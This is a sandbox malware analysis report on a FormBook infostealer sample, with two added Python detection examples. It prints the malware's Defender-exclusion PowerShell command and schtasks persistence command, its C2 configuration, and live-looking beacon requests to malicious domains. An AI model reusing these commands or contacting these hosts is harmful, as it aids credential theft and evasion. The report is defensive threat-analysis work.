

Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample Name: Swift Copy.exe
Analysis ID: 682145
MD5: 50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1: 26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256: 0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Swift Copy.exe (PID: 1740, cmdline: "C:\Users\user\Desktop\Swift Copy.exe", MD5: 50D4FB3F5A33007C2F80E5BBAA5E0CCD)
    • powershell.exe (PID: 2300, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe", MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2292, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5924, cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp", MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1164, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 4200, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3968, cmdline: C:\Windows\Explorer.EXE, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 1164, cmdline: C:\Windows\SysWOW64\autofmt.exe, MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5496, cmdline: C:\Windows\SysWOW64\NETSTAT.EXE, MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup
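The process tree above contains the whole FormBook execution chain in four process-creation events: the .NET dropper runs powershell.exe to add a Defender exclusion for its own copy under AppData\Roaming, registers a scheduled task under Updates\ from an XML file in Temp, starts RegSvcs.exe with no arguments as a hollowing host, and, once it has migrated into explorer.exe, spawns 32-bit system tools (NETSTAT.EXE, autofmt.exe) from there. The Python below is an added example, not code from Joe Sandbox or from the sample, that scores process-creation events for exactly those four behaviours. The event records are constructed here from the command lines in the tree (PIDs and paths as listed), and the field names of the ProcEvent record are an assumption about whatever Sysmon/EDR export you would feed it.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # path of the new process
    cmdline: str        # full command line as logged
    parent_image: str   # path of the creating process


def _basename(path: str) -> str:
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def _no_arguments(ev: ProcEvent) -> bool:
    """True when the command line is nothing but the image path (quoted or not)."""
    return ev.cmdline.strip().strip('"').lower() == ev.image.lower()


USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
SYSWOW64 = re.compile(r"^c:\\windows\\syswow64\\", re.I)
# .NET Framework utilities that .NET loaders commonly pick as hollowing hosts
DOTNET_UTILS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
DEV_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}


def detect(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (finding, severity) pairs for one process-creation event."""
    name, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.cmdline
    findings = []
    # 1. Defender tampering: Add-MpPreference adding an exclusion, worse when it covers a user-writable path
    if name == "powershell.exe" and re.search(r"add-mppreference\s+-exclusion(path|process|extension)", cmd, re.I):
        findings.append(("defender_exclusion_added", "high" if USER_WRITABLE.search(cmd) else "medium"))
    # 2. Persistence: schtasks /Create, high when the task definition is imported from a temp file
    if name == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        if TEMP_DIR.search(cmd):
            findings.append(("schtasks_create_from_temp_xml", "high"))
        else:
            findings.append(("schtasks_create", "low"))
    # 3. Hollowing host: a .NET Framework utility started with no arguments by a non-developer parent
    if name in DOTNET_UTILS and _no_arguments(ev) and parent not in DEV_PARENTS:
        findings.append(("dotnet_utility_started_without_args", "high"))
    # 4. Post-injection spawn: explorer.exe launching a 32-bit system tool with no arguments
    if parent == "explorer.exe" and SYSWOW64.match(ev.image) and _no_arguments(ev):
        findings.append(("explorer_spawns_syswow64_tool", "medium"))
    return findings


def triage(events: list[ProcEvent]) -> dict[int, list[tuple[str, str]]]:
    """pid -> findings, for the events that produced at least one."""
    out = {}
    for ev in events:
        f = detect(ev)
        if f:
            out[ev.pid] = f
    return out


def technique_count(events: list[ProcEvent]) -> int:
    """Number of distinct behaviours seen; several at once is the chain, one alone is a lead."""
    return len({tag for ev in events for tag, _ in detect(ev)})


# Constructed from the process tree in the report; the notepad event is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(1740, 0, r"C:\Users\user\Desktop\Swift Copy.exe", r'"C:\Users\user\Desktop\Swift Copy.exe"', ""),
    ProcEvent(2300, 1740, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe"',
              r"C:\Users\user\Desktop\Swift Copy.exe"),
    ProcEvent(5924, 1740, r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp"',
              r"C:\Users\user\Desktop\Swift Copy.exe"),
    ProcEvent(4200, 1740, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", r"C:\Users\user\Desktop\Swift Copy.exe"),
    ProcEvent(3968, 4200, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"),
    ProcEvent(1164, 3968, r"C:\Windows\SysWOW64\autofmt.exe", r"C:\Windows\SysWOW64\autofmt.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(5496, 3968, r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\SysWOW64\NETSTAT.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(7000, 3968, r"C:\Windows\System32\notepad.exe",
              r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt', r"C:\Windows\Explorer.EXE"),
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, findings)
    print("distinct techniques:", technique_count(SAMPLE_EVENTS))
```

Rule 4 on its own is noisy on real fleets (explorer legitimately launches many things), which is why the severities differ and why technique_count exists: the Defender exclusion plus the temp-file scheduled task plus an argument-less RegSvcs.exe from the same parent is the loader chain, and one of them alone is a lead to pivot on.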

Malware Configuration

{"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}

Yara matches in memory dumps (Source, Rule, Description, Author, Strings):

Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Windows_Trojan_Formbook_1112e116 (description: unknown; author: unknown)
    • 0x6601:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1d750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x16b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x16955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x16401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x16bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1564c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb242:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1c3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1d4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x18e19:$sqlite3step: 68 34 1C 7B E1
    • 0x18f4c:$sqlite3step: 68 34 1C 7B E1
    • 0x18e5b:$sqlite3text: 68 38 2A 90 C5
    • 0x18fa3:$sqlite3text: 68 38 2A 90 C5
    • 0x18e72:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18fc5:$sqlite3blob: 68 53 D8 7F 8C
Source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
(29 further memory-dump matches not shown)
Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):

Source: 8.0.RegSvcs.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
  Rule: Windows_Trojan_Formbook_1112e116 (description: unknown; author: unknown)
    • 0x5801:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1c950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9b2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x15d57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 (autogenerated rule brought to you by yara-signator; author: Felix Bilstein - yara-signator at cocacoding dot com)
    • 0x15b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x96fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1484c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa442:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b5a7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c6ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook (detect Formbook in memory; author: JPCERT/CC Incident Response Group)
    • 0x18019:$sqlite3step: 68 34 1C 7B E1
    • 0x1814c:$sqlite3step: 68 34 1C 7B E1
    • 0x1805b:$sqlite3text: 68 38 2A 90 C5
    • 0x181a3:$sqlite3text: 68 38 2A 90 C5
    • 0x18072:$sqlite3blob: 68 53 D8 7F 8C
    • 0x181c5:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack
  Rule: JoeSecurity_FormBook (Yara detected FormBook; author: Joe Security)
(3 further unpacked-PE matches not shown)
          No Sigma rule has matched
          No Snort rule has matched
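The listings above give, for each rule that fired, the byte strings that matched and the offsets at which they matched in the dump or unpacked image; the same strings hit the RegSvcs.exe unpack and the NETSTAT.EXE memory region at offsets that differ by a constant, which is what you expect from one payload mapped at two bases. Re-creating that check outside the sandbox is useful when you want to sweep your own memory dumps for the same family. The Python below is an added example, not code from Joe Sandbox, Elastic, yara-signator or JPCERT/CC: it takes the hex strings exactly as listed for Windows_Trojan_Formbook_1112e116 and for the JPCERT/CC rule, scans a byte buffer for them, applies an "N of them" condition, emits equivalent YARA source, and decodes the JPCERT strings, each of which is a 5-byte x86 push imm32, to the 32-bit constants the rule names after sqlite3 functions. The buffer it scans is constructed here with five of the listed strings placed at the offsets reported for the 00000019...02430000 dump; the condition thresholds and the "Formbook_JPCERT" label are assumptions, since the report shows only matched strings and not the rules' condition clauses, and reading the constants as hashes of sqlite3 API names is an inference from the string names, not something the report states.

```python
import struct

# Hex strings exactly as the report lists them for two of the matching rules.
# "Formbook_JPCERT" is a label used here; the report names the JPCERT/CC rule just "Formbook".
RULES = {
    "Windows_Trojan_Formbook_1112e116": {
        "$a1": "3C 30 50 4F 53 54 74 09 40",
        "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
        "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
        "$a4": "04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83",
    },
    "Formbook_JPCERT": {
        "$sqlite3step": "68 34 1C 7B E1",
        "$sqlite3text": "68 38 2A 90 C5",
        "$sqlite3blob": "68 53 D8 7F 8C",
    },
}
# Assumed "N of them" thresholds: the report shows matched strings, not the rules' condition clauses.
MIN_STRINGS = {"Windows_Trojan_Formbook_1112e116": 2, "Formbook_JPCERT": 3}


def hex_to_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(" ", ""))


def find_all(buf: bytes, pattern: bytes) -> list:
    """Every offset at which pattern occurs in buf, overlapping occurrences included."""
    offsets, i = [], buf.find(pattern)
    while i != -1:
        offsets.append(i)
        i = buf.find(pattern, i + 1)
    return offsets


def scan(buf: bytes) -> dict:
    """{rule: {string_id: [offsets]}} restricted to strings that occur at least once."""
    result = {}
    for rule, strings in RULES.items():
        hits = {sid: find_all(buf, hex_to_bytes(h)) for sid, h in strings.items()}
        result[rule] = {sid: offs for sid, offs in hits.items() if offs}
    return result


def matched_rules(buf: bytes) -> list:
    """Rules whose number of distinct matching strings reaches the assumed threshold."""
    return [rule for rule, hits in scan(buf).items() if len(hits) >= MIN_STRINGS[rule]]


def push_imm32(hexstr: str) -> int:
    """Decode a 5-byte x86 'push imm32' (opcode 0x68) to its little-endian immediate."""
    b = hex_to_bytes(hexstr)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", b[1:])[0]


def to_yara(rule: str) -> str:
    """Equivalent YARA source for one rule, using the listed hex strings verbatim."""
    out = [f"rule {rule} {{", "  strings:"]
    out += [f"    {sid} = {{ {h} }}" for sid, h in RULES[rule].items()]
    out += ["  condition:", f"    {MIN_STRINGS[rule]} of them", "}"]
    return "\n".join(out)


# Constructed test buffer: NOP filler with five of the listed strings placed at the offsets the
# report gives for the 00000019...02430000 dump, so scan() reproduces those hits exactly.
PLACEMENTS = [
    ("Windows_Trojan_Formbook_1112e116", "$a1", 0x6601),
    ("Windows_Trojan_Formbook_1112e116", "$a3", 0xa92f),
    ("Formbook_JPCERT", "$sqlite3step", 0x18e19),
    ("Formbook_JPCERT", "$sqlite3text", 0x18e5b),
    ("Formbook_JPCERT", "$sqlite3blob", 0x18e72),
]


def build_sample(placements=PLACEMENTS, size=0x20000) -> bytes:
    buf = bytearray(b"\x90" * size)
    for rule, sid, off in placements:
        pat = hex_to_bytes(RULES[rule][sid])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    sample = build_sample()
    print(scan(sample))
    print("matched:", matched_rules(sample))
    for sid, h in RULES["Formbook_JPCERT"].items():
        print(f"{sid}: push 0x{push_imm32(h):08X}")
    print(to_yara("Windows_Trojan_Formbook_1112e116"))
```

The JPCERT strings are worth understanding rather than just matching: a `push` of a fixed 32-bit constant right where an import would normally be resolved is the fingerprint of API hashing, so they survive repacking of the loader but not a change of the hash function. The Elastic-style $a1 string (`3C 30 50 4F 53 54 74 09 40`) embeds the ASCII "0POST", which ties it to the HTTP code path seen in the Networking section.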


          AV Detection

Source: Swift Copy.exe | Virustotal: Detection: 21%
Source: Swift Copy.exe | ReversingLabs: Detection: 19%
Source: Yara match | File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 | Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/ | Avira URL Cloud: Label: malware
Source: http://www.epic45.co.uk/bwe0/ | Avira URL Cloud: Label: malware
Source: www.my1245.com/bwe0/ | Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== | Avira URL Cloud: Label: malware
Source: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9 | Avira URL Cloud: Label: malware
Source: http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== | Avira URL Cloud: Label: malware
Source: http://www.mogdento.com/bwe0/ | Avira URL Cloud: Label: malware
Source: http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe | ReversingLabs: Detection: 19%
Source: 8.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (the same configuration as the JSON listed earlier in this report: C2 list www.my1245.com/bwe0/ and 64 encoded decoy entries)
Source: Swift Copy.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Swift Copy.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, | source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb | source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 103.92.235.55:80
Source: C:\Windows\explorer.exe | Domain query: www.mogdento.com
Source: C:\Windows\explorer.exe | Network Connect: 103.67.235.120:80
Source: C:\Windows\explorer.exe | Network Connect: 192.3.130.2:80
Source: C:\Windows\explorer.exe | Network Connect: 85.159.66.93:80
Source: C:\Windows\explorer.exe | Domain query: www.kinemartigues.com
Source: C:\Windows\explorer.exe | Network Connect: 51.159.175.169:80
Source: C:\Windows\explorer.exe | Domain query: www.blackyaga.xyz
Source: C:\Windows\explorer.exe | Domain query: www.epic45.co.uk
Source: C:\Windows\explorer.exe | Domain query: www.expectedclosure.one
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE (cmdline: C:\Windows\SysWOW64\NETSTAT.EXE)
Source: C:\Windows\explorer.exe | DNS query: www.blackyaga.xyz
Source: Malware configuration extractor | URLs: www.my1245.com/bwe0/
Source: Joe Sandbox View | ASN Name: ZINIOSS-AS-IN (Zinios Information Technology Pvt Ltd, IN)
Source: Joe Sandbox View | ASN Name: DREAMSCAPE-AS-AP (Dreamscape Networks Limited, AU)
Source: global traffic | HTTP traffic detected:
  GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== HTTP/1.1
  Host: www.blackyaga.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /bwe0/?9rV8zl=z0a7bU3Grk9SZV+rn0o4us/noU2vzWsLY51yg1R10n5VTVON6q0J/IdVbRNrmdil3H/zWNK1GQbVnCycFh7AKivH+ief+xiP+g==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
  Host: www.expectedclosure.one
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== HTTP/1.1
  Host: www.kinemartigues.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 HTTP/1.1
  Host: www.epic45.co.uk
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  GET /bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== HTTP/1.1
  Host: www.mogdento.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
